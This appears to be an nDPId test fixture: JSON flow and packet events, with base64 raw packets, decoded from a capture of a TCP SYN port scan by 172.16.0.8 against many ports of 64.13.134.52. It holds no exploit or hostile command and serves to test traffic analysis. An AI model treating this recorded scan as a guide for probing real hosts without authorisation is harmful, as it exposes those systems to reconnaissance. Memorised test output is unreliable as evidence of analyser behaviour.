+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAs+6cAADQGGMusEAAIQA2GNIzT6nTdU4MZAAAAAGACBABKFwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAscTcAADAGpzusEAAIQA2GNIzTA\/3dU4MZAAAAAGACBAAwjwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAsQq0AACUG4MWsEAAIQA2GNIzTJxzdU4MZAAAAAGACCAAJcAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsKY4AADkG5eSsEAAIQA2GNIzTDL3dU4MZAAAAAGACCAAjzwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAseEMAADcGmS+sEAAIQA2GNIzTwAXdU4MZAAAAAGACEABohgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAss4gAADIGYuqsEAAIQA2GNIzTAgDdU4MZAAAAAGACDAAqjAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs5VEAACYGPSGsEAAIQA2GNIzTBBTdU4MZAAAAAGACDAAoeAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsuG8AADcGWQOsEAAIQA2GNIzTDMTdU4MZAAAAAGACEAAbyAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAslPkAACYGjXmsEAAIQA2GNIzTF0rdU4MZAAAAAGACDAAVQgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAshy8AACwGlUOsEAAIQA2GNIzTFJXdU4MZAAAAAGACBAAf9wAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs66kAACoGMsmsEAAIQA2GNIzTB\/LdU4MZAAAAAGACDAAkmgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAslfEAACwGhoGsEAAIQA2GNIzTF3XdU4MZAAAAAGACBAAdFwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsB4gAADsGBeusEAAIQA2GNIzTBFbdU4MZAAAAAGACEAAkNgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ7wAADkG57asEAAIQA2GNIzTCp7dU4MZAAAAAGACCAAl7gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsUvkAADoGu3msEAAIQA2GNIzTBFDdU4MZAAAAAGACDAAoPAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ3YAADUGq\/ysEAAIQA2GNIzTBxTdU4MZAAAAAGACCAApeAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsTd8AAC4GzJOsEAAIQA2GNIzTATLdU4MZAAAAAGACDAArWgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsYRgAADUGslqsEAAIQA2GNIzTC9fdU4MZAAAAAGACCAAktQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs4skAACoGO6msEAAIQA2GNIzTCWHdU4MZAAAAAGACDAAjKwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAs3AEAACgGRHGsEAAIQA2GNIzTB0fdU4MZAAAAAGACBAAtRQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsEIIAAC4GCfGsEAAIQA2GNIzTwADdU4MZAAAAAGACDABsiwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsSxwAADUGyFasEAAIQA2GNIzTJErdU4MZAAAAAGACCAAMQgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsk5cAACsGidusEAAIQA2GNIzTImDdU4MZAAAAAGACEAAGLAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsHsIAACgGAbGsEAAIQA2GNIzTBBndU4MZAAAAAGACBAAwcwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 